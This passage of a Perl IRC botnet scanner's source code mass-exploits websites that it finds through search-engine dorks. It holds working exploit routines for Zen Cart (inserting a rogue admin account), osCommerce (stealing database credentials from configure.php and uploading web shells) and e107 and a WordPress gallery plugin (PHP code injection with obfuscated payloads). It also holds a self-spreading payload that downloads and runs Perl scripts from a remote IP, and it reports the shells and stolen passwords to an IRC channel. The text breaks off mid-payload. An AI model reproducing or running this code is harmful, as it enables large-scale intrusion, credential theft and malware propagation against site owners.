- if ($engine =~ /jackinfo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKInfO",$type); } exit; } }
- if ($engine =~ /jackir/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIR",$type); } exit; } }
- if ($engine =~ /jackit/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKIT",$type); } exit; } }
- if ($engine =~ /jackjp/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKJP",$type); } exit; } }
- if ($engine =~ /jackkr/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKKR",$type); } exit; } }
- if ($engine =~ /jackmx/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMX",$type); } exit; } }
- if ($engine =~ /jackmy/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKMY",$type); } exit; } }
- if ($engine =~ /jacknet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNeT",$type); } exit; } }
- if ($engine =~ /jacknl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKNL",$type); } exit; } }
- if ($engine =~ /jackorg/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKOrG",$type); } exit; } }
- if ($engine =~ /jackph/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPH",$type); } exit; } }
- if ($engine =~ /jackpl/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKPL",$type); } exit; } }
- if ($engine =~ /jackro/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRO",$type); } exit; } }
- if ($engine =~ /jackru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKRU",$type); } exit; } }
- if ($engine =~ /jackth/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKTH",$type); } exit; } }
- if ($engine =~ /jackua/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUA",$type); } exit; } }
- if ($engine =~ /jackuk/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUK",$type); } exit; } }
- if ($engine =~ /jackus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKUS",$type); } exit; } }
- if ($engine =~ /jacksi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKSI",$type); } exit; } }
- if ($engine =~ /jackbe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBE",$type); } exit; } }
- if ($engine =~ /jackbiz/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"JacKBIZ",$type); } exit; } }
- }
- if ($engine =~ /google/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"GooGLe",$type); } exit; } }
- if ($gps2 ==1) {
- if ($engine =~ /bing/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"Bing",$type); } exit; } }
- if ($engine =~ /biglobe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"BigLobe",$type); } exit; } }
- if ($engine =~ /walla/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"WaLLa",$type); } exit; } }
- if ($engine =~ /yahoo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"YaHoo",$type); } exit; } }
- if ($engine =~ /ask/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AsK",$type); } exit; } }
- if ($engine =~ /uol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"UoL",$type); } exit; } }
- if ($engine =~ /onet/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"OnEt",$type); } exit; } }
- if ($engine =~ /clusty/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"CLusTy",$type); } exit; } }
- if ($engine =~ /sapo/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SaPo",$type); } exit; } }
- if ($engine =~ /aol/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"AoL",$type); } exit; } }
- if ($engine =~ /lycos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"LyCos",$type); } exit; } }
- if ($engine =~ /hotbot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"HotBot",$type); } exit; } }
- if ($engine =~ /seznam/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$simpan,$dork,"SeZNam",$type); } exit; } }
- }
- }
- ###### EXPLOITING #######
- sub rfg_exploit() {
- my $chan = $_[0];
- my $bugz = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bugz,$dork,$engine,$rfglogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$rfglogo $engine Finished for $dork "); }
- my $test = "http://garguritos.com/rfg.php?url=http://".$site;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $vpath = "wp-content/plugins/radykal-fancy-gallery/admin/";
- if ($html =~ /<a href=\"http:\/\/(.*)$vpath(.*)\">Your shell/){
- my $vuln = $1; my $qr = $2;
- my $upl = "http://".$vuln.$vpath.$qr."wget%20".$thumbshell;
- my $crut = &get_content($upl);
- if ($crut =~ /3xploit/) {
- my $shell = "http://".$vuln.$vpath."bad.php";
- my $check = &get_content($shell);
- if ($check =~ /stunshell/i){
- my $safe = ""; my $os = ""; my $uid = "";
- if ($check =~ m/SAFE_MODE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;}
- if ($check =~ m/color=red><b> (.*?)<br>/) {$os = $1;}
- if ($check =~ m/uid=(.*?)gid=/) {$uid = $1;}
- &msg("$admin","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$rfglogo $engine <=> sHeLL <=> ".$shell." (SafeMode=$safe) (OS=$os) uid=$uid ");
- } else {
- &msg("$chan","$rfglogo $engine <=> VulN <=> http://".$vuln.$vpath.$qr." 15");
- }
- }
- }
- } exit; }
- }
- }
- }
- sub zen_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$zenlogo $engine Finished for $dork "); }
- my $test = "http://".$site.$bug;
- my $html = &get_content($test);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /zc_install/){
- &zen_query($chan,$site,$test,$engine);
- }
- } exit; }
- }
- }
- }
- sub zen_query() {
- my $chan = $_[0];
- my $url = $_[1];
- my $test = $_[2];
- my $engine = $_[3];
- my $code = "INSERT+INTO+admin+%28admin_id%2C+admin_name%2C+admin_email%2C+admin_pass%29+VALUES+%2856%2C%27adminsys%27%2C%27admin%40mazacrew.co.cc%27%2C%27617ec22fbb8f201c366e9848c0eb6925%3A87%27%29%3B";
- my $req = HTTP::Request->new(POST => $test);
- $req->content_type("application/x-www-form-urlencoded");
- $req->content("query_string=".$code);
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(3);
- my $res = $ua->request($req);
- my $data = $res->as_string;
- if ( $data =~ /1 statements processed/i ) {
- &msg("$chan","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
- &msg("$admin","$zenlogo $engine <=> VulN <=> http://".$url."admin/login.php ");
- }
- elsif ( $data =~ /Duplicate entry/i ) {
- &msg("$chan","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php )");
- &msg("$admin","$zenlogo $engine <=> SuccesS <=> http://".$url."admin/login.php ");
- }
- }
- sub osco_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$oscologo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$oscologo $engine Finished for $dork "); }
- my $cat = "http://".$site."admin/categories.php/login.php";
- my $fm = "http://".$site."admin/file_manager.php/login.php";
- my $bm = "http://".$site."admin/banner_manager.php/login.php";
- my $shell = "http://".$site."images/lobex.php";
- my $dumper = "http://".$site."images/lobexdb.php";
- my $coba = &get_content($cat);
- my $cob2 = &get_content($fm);
- my $cob3 = &get_content($bm);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($coba =~ /TABLE_HEADING_CATEGORIES_PRODUCTS/i ) {
- my $test = $cat."?action=download&filename=/includes/configure.php";
- my $cek = &get_content($test);
- if ($cek =~ /http:\/\//) {
- &osql_xpl($test,$chan,$site,$engine);
- }
- my $aplod = LWP::UserAgent->new;
- my $res = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res->as_string;
- my $resa = $aplod->post($cat."?cPath=&action=new_product_preview",['products_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resa->as_string;
- my $cekap = &get_content($shell);
- if ($cekap =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
- }
- }
- if ($cob2 =~ /TABLE_HEADING_FILENAME/i) {
- my $test2 = $fm."?action=download&filename=/includes/configure.php";
- my $cek2 = &get_content($test2);
- if ($cek2 =~ /http:\/\//) {
- &osql_xpl($test2,$chan,$site,$engine);
- }
- my $aplod2 = LWP::UserAgent->new;
- my $res2 = $aplod2->post($fm."?action=processuploads",['file_1' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res2->as_string;
- my $resb = $aplod2->post($fm."?action=processuploads",['file_1' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resb->as_string;
- my $cekap = &get_content($shell);
- if ($cekap =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
- }
- }
- if ($cob3 =~ /TABLE_HEADING_BANNERS/i) {
- my $test3 = $bm."?action=download&filename=/includes/configure.php";
- my $cek3 = &get_content($test3);
- if ($cek3 =~ /http:\/\//) {
- &osql_xpl($test3,$chan,$site,$engine);
- }
- my $aplod3 = LWP::UserAgent->new;
- my $res3 = $aplod3->post($bm."?action=insert",['banners_image' => ['./lobex.jpg' => 'lobex.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $res3->as_string;
- my $resc = $aplod3->post($bm."?action=insert",['banners_image' => ['./mysql.jpg' => 'lobexdb.php' => 'application/octet-stream']],'Content-Type' => 'form-data'); $resc->as_string;
- my $cekap = &get_content($shell);
- if ($cekap =~ /UnKnown - Simple Shell/) {
- my $safe = ""; my $os = ""; my $uid = "";
- if ($cekap =~ /SAFE_MODE : (.*?)<\/b>/){$safe=$1;}
- if ($cekap =~ /Uname : (.*?)<\/b>/){$os=$1;}
- if ($cekap =~ /uid=(.*?)gid=/){$uid=$1;}
- &msg("$chan","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$admin","$oscologo $engine <=> sHeLL <=> $shell (SafeMode=$safe) (OS=$os) uid=$uid ");
- &msg("$chan","$oscologo $engine <=> Dumper <=> $dumper ");sleep(1);
- }
- }
- } exit;
- }
- }
- }
- }
- sub osql_xpl() {
- my $url = $_[0];
- my $chan = $_[1];
- my $site = $_[2];
- my $engine = $_[3];
- my $request = HTTP::Request->new(GET=>$url);
- my $browser = LWP::UserAgent->new();
- $browser->timeout(10);
- my $response = $browser->request($request);
- my @dbsinfo;
- if ($response->is_success) {
- my $dpath = ""; my $dbserver = ""; my $dbuser = ""; my $dbpass = ""; my $dbname = "";
- my $res = $response->as_string;
- if ($res =~ m/'DIR_FS_CATALOG', '(.*)'/g) {
- $dpath = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DIR path: $dpath");
- }
- if ($res =~ m/'DB_SERVER', '(.*)'/g) {
- $dbserver = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB Server: $dbserver");
- }
- if ($res =~ m/'DB_SERVER_USERNAME', '(.*)'/g) {
- $dbuser = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB username: $dbuser");
- }
- if ($res =~ m/'DB_SERVER_PASSWORD', '(.*)'/g) {
- $dbpass = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB password: $dbpass");
- }
- if ($res =~ m/'DB_DATABASE', '(.*)'/g) {
- $dbname = $1;
- &msg("$chan","$oscosqllogo $engine <=> http://".$site." [+]DB database: $dbname");
- }
- my $hosts = "http://".$site;
- if($hosts =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) {
- $host = $2;
- &dbi_connect($host,$dbuser,$dbpass,$dbname,$chan,$engine,$oscologo);sleep(1);
- if ($dbuser =~ /_/) { my @users = split("_",$dbuser); my $dbuser = $users[0]; }
- &ftp_connect($url,$host,$dbuser,$dbpass,$chan,$engine,$oscologo);sleep(1);
- }
- }
- }
- sub e107_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$e107logo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$e107logo $engine Finished for $dork "); }
- my $test = "http://".$site.$bug;
- my $shellz = "http://".$site."/images/lobex.php";
- my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQplY2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHkoJGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRyZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVjJykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3BlbigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJlYWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
- my $html = &e107_rce_query($test,$code);
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if ($html =~ /v0pCr3w<br>sys:(.+?)<br>nob0dyCr3w/) {
- my $sys = $1;
- my $upload = "";
- my $res = &e107_rce_query($test);
- if ($res =~ /lobexxx/) {
- my $check = &get_content($shellz);
- if ($check =~ /UnKnown - Simple Shell/) {
- &msg("$chan","$e107logo $engine <=> SheLL <=> $shellz ");sleep(2);
- }
- } else { &msg("$chan","$e107logo $engine <=> System <=> $test ($sys) ");sleep(2); }
- }
- } exit; }
- }
- }
- }
- sub e107_rce_query() {
- my $url = $_[0];
- my $code = encode_base64('echo "lobexxx";')."JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIMDBjYm90ajNhZm5pT01SQ2dtWXFudm9tVUwrRVJJcXhGYTVUTTFzN1oxODdOc3Q2VUR3OFJFa1U4MXFneVZOcmVEak90VWFKdXBaRmxBY2tJemt1eVZlMTlXTkJ4SjdKSStWZFlUQmJLVXYrKzAyVE1RQnJYSHZveUpveXJmV09FRHNsbkpRVk9pd2ZnNW9TZk51eHoybmo3dDBYYzNmMmZISUQrZnBJNkVWZm1nSEV5SnptdUUwUDZCdmNyaVkwR1BxV25yd3R0WHVSc0xOSlR3QzRYY3FXSlhwYk1wNXA5MFpTZ3hqNWE4cFJoZThOM2t2TzEzOGFoNURIT0t2UDdBZkFkck96VU9kbXVsTUVCbVJCc2xYWmV3b3ZINEE3U1M4ZGE1Vm83Mk0xL3REQXVzeUpCeVFYUG1IYWpnK2dYM2N4c21qSkVTcXQ1N1Z1QUtmQjROODRtL3FSb3pnODIycXRJWExPRmJoK1R6U0kyNHFPYWxuMzBlSjFVc0FVK1E1SnhzVVcranJjSXRzamFWQ2R0cGExNmExamVqUldMaXQwNmx0d3MyY293Ulk3YnZsemZnYjJXcWFQaDFPVUE2Y2s0ekVYR0xSemVPbzBremozZ0RNak1ibDQ4c3NoVGRIYUVBUGViRkoyWGthWEI1bDFJNDVrMGFERS9KQlJwZVBkVk14WHdsbkVwN29WMGJ4Y3kyZktIU0pMQXYwQlJnOG43T2h3c3IrTWVvU2ZrMmR5MkZ5TFhVTitvREdyRVZVazc4OVM4dVlEVnJLU0lmZUZYSzJ1ekxKVnp1Yk5FWWJlVWVXWUw0clRFa3NWcFJUQXlXWnp5anc0UDN4Rk1MUERwbmNIYlF5NG1ZcS9wbllhL0diUFQ1TER0ZkR6OUZ3PT0iKSkpOwokZmljaGllciA9IGZvcGVuKCcuL2ltYWdlcy9sb2JleC5waHAnLCd3Jyk7CmZ3cml0ZSgkZmljaGllciwgJGMpOwpmY2xvc2UoJGZpY2hpZXIpOwo=";
- my $req = HTTP::Request->new(POST => $url);
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("send-contactus=1&author_name=[php]eval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $res = $ua->request($req);
- return $res->content;
- }
- sub e107_spread_query() {
- my $url = $_[0];
- my $code = "ZWNobyAidjBwQ3Izdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1lKCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDcjN3O2NkIC90bXA7cm0gLXJmIGRvci4qICoudHh0Lio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3htbC50eHQ7cGVybCB4bWwudHh0O3JtIC1yZiB4bWwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveG1sLnR4dDtwZXJsIHhtbC50eHQ7Y2QgL3Zhci90bXA7cm0gLXJmIGRvci4qICouanBnLio7ZmV0Y2ggaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O3dnZXQgaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2N1cmwgLU8gaHR0cDovLzIxNy4xNi44LjIzL353ZWJtYWlsL3hwbC50eHQ7cGVybCB4cGwudHh0O3JtIC1yZiB4cGwudHh0O2x3cC1kb3dubG9hZCBodHRwOi8vMjE3LjE2LjguMjMvfndlYm1haWwveHBsLnR4dDtwZXJsIHhwbC50eHQ7IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7ZWNobyAkZXNlZ3VpY21kOw0KZnVuY3Rpb24gZXgoJGNmZSl7DQokcmVzID0gJyc7DQppZiAoIWVtcHR5KCRjZmUpKXsNCmlmKGZ1bmN0aW9uX2V4aXN0cygnZXhlYycpKXsNCkBleGVjKCRjZmUsJHJlcyk7DQokcmVzID0gam9pbigiXG4iLCRyZXMpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygnc2hlbGxfZXhlYycpKXsNCiRyZXMgPSBAc2hlbGxfZXhlYygkY2ZlKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3N5c3RlbScpKXsNCkBvYl9zdGFydCgpOw0KQHN5c3RlbSgkY2ZlKTsNCiRyZXMgPSBAb2JfZ2V0X2NvbnRlbnRzKCk7DQpAb2JfZW5kX2NsZWFuKCk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKXsNCkBvYl9zdGFydCgpOw0KQHBhc3N0aHJ1KCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29udGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3BvcGVuJykpew0KJGYgPSBAcG9wZW4oJGNmZSwiciIpOw0Kd2hpbGUoIUBmZW9mKCRjZmUpKSB7ICRyZXMgLj0gQGZyZWFkKCRjZmUsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
- my $req = HTTP::Request->new(POST => $url);
- $req->content_type('application/x-www-form-urlencoded');
- $req->content("send-contactus=1&author_name=%5Bphp%5Deval(base64_decode('".$code."'))%3Bdie%28%29%3B%5B%2Fphp%5D");
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $res = $ua->request($req);
- }
- sub ih_exploit() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $simpan = $_[2];
- my $dork = $_[3];
- my $engine = $_[4];
- my $count = 0;
- my @totexploit = &search_engine($chan,$bug,$dork,$engine,$ihlogo);
- my $num = scalar(@totexploit);
- if ($num > 0){
- foreach my $site(@totexploit){
- $count++;
- if ($count == $num-1) { &msg("$chan","$ihlogo $engine Finished for $dork "); }
- my $ihxxx = "JGM9Z3ppbmZsYXRlKHN0cl9yb3QxMyhiYXNlNjRfZGVjb2RlKCJyVWw2UXVOVEVQNWNKUDdEc3MzSmpnNGNxRWZwQkRGcWxKZ1N0UkFhSi8wQ3lHWHNXcktIdmJacDErUkZ4SC92eks2ZGwrT09SZWtpb1Rnenp6TXZ6ODZPNlg0czUrWHVqbTlYOFU5UlY4ZEZ1KzJUM1IwbWNpRWp5Y3BQZHk1ejdpRWErWlM0ZTF3cHB0MUpGQVp1MkI5YzN6cVQrR2I4NE55MzJ6ODk3ZTYwSHJuaU9pa3FvWWxDRG9IVVRiQUpQQ0p1K0dvd3ZLV1hvOUZhWnprSVZQUWUzVng4M21VUGc3L0dUamlLeHNPK0JWbUtad2tJR3FjeFRNWnZVNERCRWxydUJJWlRQbEtZaXFjc1Axa1pRRDlrd2FNWlIrbWdNY3FMbERtcitrckFObXgzS1paSGt1c2xoQS9QTG9Mb2Q5QUxJTURnNG9LZVBJTUttVyt2b0s0QmNVVXpURExwVU1ac29mUnhLZUtjdWF1T0hQc2RuZlZ0VUpDcDdwazk2RTlQa08rUmhzSFZZQlI1a1BLWWRDNjF2Y09oeEJLWW4zTjE5WklpcC91RUdxWG9QcjJNRmMvSVltc3NzU0JtcmN2alFhZlJDa2Q0MnJrVC9Sc1NNdm5Jc0pDNml6dE93TnF2MDRDNXFaV2F5bDhjZTMzS2VMRmVJTjYvTnlyeHFkdU16dS9CNk5aV3NrOHdIQnVjR2toSE1tNmJadUNFNThQK3pTaTY2UDhaWEo5ZEJZNlpoWlFwelltL1UvVUc1K09yNEcwVURRZURrV2J2MGM2aVBPQWl5U3FBNHJQaWJKa3hEOFljcDFFeUs3UE50MEo1d0xaNjRBZU8wUEdiVStqWWpoQ0FrbXhPZFVwbW5iSFRzZmhRRkF0T0RsVjFkeWZobkhKTXQzQzkzWWswZjloYVdwc1dZOWtVLzRmNXY1Q2t5T0RVZnY1Z1BnQThwZDRxdDFTN25jbUszQUp3UjhHaCs5U2xIclFhZ1FIM